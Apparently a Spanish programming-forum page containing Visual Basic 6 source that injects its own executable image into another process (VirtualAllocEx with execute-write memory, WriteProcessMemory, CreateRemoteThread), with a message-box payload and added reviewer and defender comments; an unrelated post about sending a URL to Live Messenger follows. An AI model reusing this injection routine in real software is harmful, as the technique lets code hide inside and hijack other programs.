  3. Public Declare Function VirtualFreeEx Lib "kernel32" (ByVal ProcessHandle As Long, lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
  4. Public Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
  5. Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
  6. Public Declare Function CreateRemoteThread Lib "kernel32" (ByVal ProcessHandle As Long, lpThreadAttributes As Long, ByVal dwStackSize As Long, lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
  7. Public Declare Function GetModuleHandleA Lib "kernel32" (ByVal ModName As String) As Long
  8. Public Declare Function WriteProcessMemory Lib "kernel32" (ByVal ProcessHandle As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nsize As Long, lpNumberOfBytesWritten As Long) As Long
  9. Public Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
  10. Public Declare Function MessageBox Lib "user32" Alias "MessageBoxA" (ByVal hwnd As Long, ByVal lpText As String, ByVal lpCaption As String, ByVal wType As Long) As Long
  11. Public Declare Function DeleteFile Lib "kernel32" Alias "DeleteFileA" (ByVal lpFileName As String) As Long
  12. Public Declare Function CreateEvent Lib "kernel32" Alias "CreateEventA" (ByVal lpEventAttributes As Long, ByVal bManualReset As Long, ByVal bInitialState As Long, ByVal lpname As String) As Long
  13. Public Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hmodule As Integer, ByVal lpFileName As String, ByVal nsize As Integer) As Integer
  14. Public Declare Sub ExitThread Lib "kernel32" (ByVal dwExitCode As Long)
  15. Public Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
  16.  
  17. Const MEM_COMMIT = &H1000
  18. Const MEM_RESERVE = &H2000
  19. Const MEM_RELEASE = &H8000
  20. Const PAGE_EXECUTE_READWRITE = &H40&
  21. Const IMAGE_NUMBEROF_DIRECTIRY_ENRIES = 16
  22. Const STANDARD_RIGHTS_REQUIRED = &HF0000
  23. Const SYNCHRONIZE = &H100000
  24. Const PROCESS_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &HFFF)
  25.  
  26. Type IMAGE_DATA_DIRECTORY
  27.    VirtualAddress As Long
  28.    Size As Long
  29. End Type
  30.  
  31. Type IMAGE_FILE_HEADER
  32.    Machine As Integer
  33.    NumberOfSections As Integer
  34.    TimeDataStamp As Long
  35.    PointerToSymbolTable As Long
  36.    NumberOfSymbols As Long
  37.    SizeOfOptionalHeader As Integer
  38.    Characteristics As Integer
  39. End Type
  40.  
  41. Type IMAGE_OPTIONAL_HEADER32
  42.    Magic As Integer
  43.    MajorLinkerVersion As Byte
  44.    MinorLinkerVersion As Byte
  45.    SizeOfCode As Long
  46.    SizeOfInitalizedData As Long
  47.    SizeOfUninitalizedData As Long
  48.    AddressOfEntryPoint As Long
  49.    BaseOfCode As Long
  50.    BaseOfData As Long
  51.    ImageBase As Long
  52.    SectionAlignment As Long
  53.    FileAlignment As Long
  54.    MajorOperatingSystemVersion As Integer
  55.    MinorOperatingSystemVersion As Integer
  56.    MajorImageVersion As Integer
  57.    MinorImageVersion As Integer
  58.    MajorSubsystemVersion As Integer
  59.    MinorSubsystemVersion As Integer
  60.    Reserved1 As Long
  61.    SizeOfImage As Long
  62.    SizeOfHeaders As Long
  63.    CheckSum As Long
  64.    Subsystem As Integer
  65.    DllCharacteristics As Integer
  66.    SizeOfStackReserve As Long
  67.    SizeOfStackCommit As Long
  68.    SizeOfHeapReserve As Long
  69.    SizeOfHeapCommit As Long
  70.    LoaerFlags As Long
  71.    NumberOfRvaAndSizes As Long
  72.    DataDirectory(IMAGE_NUMBEROF_DIRECTIRY_ENRIES - 1) As IMAGE_DATA_DIRECTORY
  73. End Type
  74.  
  75. Type test
  76.    t1 As Long
  77. End Type
  78.  
  79. Type IMAGE_DOS_HEADER
  80.    e_magic As Integer
  81.    e_cblp As Integer
  82.    e_cp As Integer
  83.    e_crlc As Integer
  84.    e_cparhdr As Integer
  85.    e_minalloc As Integer
  86.    e_maxalloc As Integer
  87.    e_ss As Integer
  88.    e_sp As Integer
  89.    e_csum As Integer
  90.    e_ip As Integer
  91.    e_cs As Integer
  92.    e_lfarlc As Integer
  93.    e_onvo As Integer
  94.    e_res(3) As Integer
  95.    e_oemid As Integer
  96.    e_oeminfo As Integer
  97.    e_res2(9) As Integer
  98.    e_lfanew As Long
  99. End Type
  100. Const szTarget As String = "project1"
  101. Dim szSharedData As String * 261
' Entry point of the "EXE injection" experiment: copies this executable's own
' in-memory image into the process that owns the window titled szTarget, at
' the same base address, then starts a remote thread there at HijackModule.
'
' Defender note: OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx with
' PAGE_EXECUTE_READWRITE -> WriteProcessMemory -> CreateRemoteThread against a
' foreign process is the classic injection sequence endpoint tooling alerts on.
'
' NOTE(review): no API result is checked (window/PID lookup, OpenProcess,
' VirtualFreeEx, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread);
' szSharedData is filled but never read; TestType is declared and unused and
' TImageFileHeader only serves as a Len() operand.
Public Sub Main()
' Sub that will start when the program is run
Dim PID As Long, ProcessHandle As Long
Dim Size As Long, BytesWritten As Long, TID As Long, Module As Long, NewModule As Long
Dim PImageOptionalHeader As IMAGE_OPTIONAL_HEADER32, PImageDosHeader As IMAGE_DOS_HEADER, TImageFileHeader As IMAGE_FILE_HEADER, TestType As test

GetModuleFileName 0, szSharedData, 261      ' own exe path (not used afterwards)

GetWindowThreadProcessId FindWindow(vbNullString, szTarget), PID   ' PID of the window titled szTarget

ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, False, PID)

Module = GetModuleHandleA(vbNullString)     ' base address of this executable

' DOS header, then the optional header, which follows the 4-byte PE signature
' and the 20-byte IMAGE_FILE_HEADER at e_lfanew.
CopyMemory PImageDosHeader, ByVal Module, Len(PImageDosHeader)

CopyMemory PImageOptionalHeader, ByVal (Module + PImageDosHeader.e_lfanew + 4 + Len(TImageFileHeader)), Len(PImageOptionalHeader)

Size = PImageOptionalHeader.SizeOfImage


' Release whatever the target has at this address, reserve+commit an RWX
' region there, and copy this process's image bytes over it.
VirtualFreeEx ProcessHandle, Module, 0, MEM_RELEASE

NewModule = VirtualAllocEx(ProcessHandle, Module, Size, MEM_RESERVE Or MEM_COMMIT, PAGE_EXECUTE_READWRITE)

WriteProcessMemory ProcessHandle, ByVal NewModule, ByVal Module, Size, BytesWritten

' Start HijackModule in the target; the thread parameter is the module base.
CreateRemoteThread ProcessHandle, ByVal 0, 0, ByVal GetAdd(AddressOf HijackModule), ByVal Module, 0, TID

MsgBox "Handle of the process is: " & ProcessHandle & vbCrLf & "Callback of HijackModule is: " & GetAdd(AddressOf HijackModule) & vbCrLf & "Handle of module is: " & Module & vbCrLf & "Size of module is: " & Size & vbCrLf & "Memory was allocated at: " & NewModule & vbCrLf & "Thread created with handle: " & TID
End Sub
  133.  
  134. Private Function GetAdd(Entrypoint As Long) As Long
  135. GetAdd = Entrypoint
  136. End Function
  137.  
' Body run by the remote thread that Main creates in the target process.
' Shows three message boxes in order and returns 0; Stuff (the thread
' parameter, the module base) is unused.
'
' NOTE(review): this executes inside the target without the VB runtime having
' been initialised for that process, so anything beyond plain Declare calls
' is likely to misbehave there — the body is left untouched for that reason.
Public Function HijackModule(Stuff As Long) As Long
MessageBox 0, "I am inside a hijacked application", "Hello!", 0
MessageBox 0, "Close the ""Inject"" message box and then delete me", "Hello!", 0
MessageBox 0, "You see? I am still running even if you deleted me.", "Hello!", 0
End Function
  143.  
  144.  

he estado intentando pero sin exito, agradeceria cualquier aporte que me puedan brindar,

Gracias.
10  Programación / Programación Visual Basic / Enviar URL a live messenger en: 26 Agosto 2008, 00:28 am
quisiera saber si hay alguna forma de enviar una URL a la ventana de chat del live messenger, de esta forma

Código:
<A href="http://myurl.com/">Mi URL</A>.

lo que quiero es mediante sendkeys enviar la URL